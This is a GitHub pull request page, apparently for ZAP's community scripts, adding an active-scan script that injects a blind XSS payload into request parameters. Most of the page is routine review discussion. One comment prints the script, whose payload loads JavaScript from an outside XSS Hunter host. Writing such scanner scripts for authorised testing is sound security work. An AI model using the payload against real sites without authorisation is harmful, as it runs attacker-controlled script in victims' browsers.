Skip to content

inject blind xss payloads #214

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 1 commit into from
Nov 1, 2021
Merged

inject blind xss payloads #214

merged 1 commit into from
Nov 1, 2021

Conversation

@MindPatch
Copy link
Contributor

@MindPatch MindPatch commented Mar 24, 2021

No description provided.

@MindPatch MindPatch force-pushed the bxss branch 2 times, most recently from 17f6a21 to 56b2dbf Compare March 24, 2021 02:12
thc202
thc202 reviewed Apr 7, 2021
View reviewed changes
@thc202
Copy link
Member

thc202 commented Apr 7, 2021

The changelog should be updated.

@kingthorin
Copy link
Member

kingthorin commented Jul 14, 2021

@knassar702 are you going to address @thc202’s feedback?

@MindPatch
Copy link
Contributor Author

MindPatch commented Aug 22, 2021

hello @thc202 @kingthorin , im so sorry for this long time I was a bit busy because of studying , i changed it now

regards

@kingthorin
Copy link
Member

kingthorin commented Aug 23, 2021

Okay, I'll rebase and address the conflict tomorrow.

@kingthorin
Copy link
Member

kingthorin commented Aug 24, 2021

Done

@kingthorin
Copy link
Member

kingthorin commented Aug 24, 2021

Note: Before you make any further changes/contributions on this PR please ensure you do the following.

git fetch origin
git reset --hard origin/bxss

(That assumes origin is your remote fork.)

@kingthorin
Copy link
Member

kingthorin commented Oct 20, 2021

If others are good with this I can fix the conflict.

@kingthorin kingthorin mentioned this pull request Nov 1, 2021
Merged
@thc202
Copy link
Member

thc202 commented Nov 1, 2021

It seems there were too many changes, the bxss is no longer being injected and it's just sending unchanged messages.

@thc202
Copy link
Member

thc202 commented Nov 1, 2021
edited
Loading

This is what was intended I think:

# by: Khaled Nassar @knassar702

# YOUR XSSHUNTER PAYLOAD
bxss = '"><script src="//yourusername.xss.ht"></script>'
def scanNode(sas, msg):
  pass


def scan(sas, msg, param, value):

  # Copy requests before reusing them
  msg = msg.cloneRequest();

  # setParam (message, parameterName, newValue)
  sas.setParam(msg, param, bxss);

  # sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
  sas.sendAndReceive(msg, False, False);

From https://raw.githubusercontent.com/zaproxy/community-scripts/17f6a21edf5df582f67c36104b85c683c933216e/active/bxss.py with the comment addressed.

@MindPatch @kingthorin
inject blind xss payloads
9ea2c59 
Add active/bxss.js


Signed-off-by: Khaled Nassar <45688522+knassar702@users.noreply.github.com>
@kingthorin
Copy link
Member

kingthorin commented Nov 1, 2021

Should be good now I think

@thc202
Copy link
Member

thc202 commented Nov 1, 2021

Thank you both!

@kingthorin kingthorin merged commit a2cb847 into zaproxy:main Nov 1, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@thc202 thc202 thc202 approved these changes

@kingthorin kingthorin kingthorin approved these changes

Assignees

No one assigned

Labels

help wanted

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@MindPatch @thc202 @kingthorin